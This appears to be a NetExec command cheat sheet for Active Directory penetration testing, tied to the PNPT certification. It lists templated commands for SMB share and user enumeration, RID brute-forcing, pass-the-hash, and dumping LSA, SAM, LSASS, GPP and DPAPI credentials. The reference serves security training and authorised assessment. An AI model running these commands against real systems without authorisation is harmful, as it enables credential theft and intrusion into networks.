SMB Share Enumeration

List all shares on the target and identify those with anonymous or guest access.

nxc smb {{target}} -u '' -p '' --shares
nxc smb {{target}} -u 'guest' -p '' --shares

User Enumeration & RID Brute Force

Enumerate valid users via SMB, or perform RID brute-forcing to discover hidden accounts; {{limit}} is the highest RID to try.

nxc smb {{dc_ip}} --users
nxc smb {{dc_ip}} --rid-brute {{limit}}

Pass the Hash (PtH) & Local Authentication

Authenticate using an NTLM hash (-H) in place of a password. With --local-auth, the credentials are checked against each target's local accounts instead of the domain.

nxc smb {{ip_range}} -u {{user}} -H {{ntlm_hash}} --local-auth

Credential Dumping (LSA & SAM)

Dump LSA secrets or SAM hashes from compromised targets where you have administrative access.

nxc smb {{target}} -u {{user}} -p {{password}} --lsa
nxc smb {{target}} -u {{user}} -p {{password}} --sam

Module Usage (lsassy & gpp_password)

Use the ‘lsassy’ module to extract LSASS credentials or ‘gpp_password’ for Group Policy Preferences (GPP) password discovery.

nxc smb {{ip_range}} -u {{user}} -p {{password}} -M lsassy
nxc smb {{ip_range}} -u {{user}} -p {{password}} -M gpp_password

DPAPI & Secrets Extraction

Search for DPAPI secrets on the target system.

nxc smb {{target}} -u {{user}} -p {{password}} --dpapi

Description

NetExec is a powerful post-exploitation tool that simplifies Active Directory security assessment by automating common tasks such as share enumeration, user discovery, and credential harvesting. It is an essential tool in PNPT for lateral movement and identifying misconfigurations across the domain.
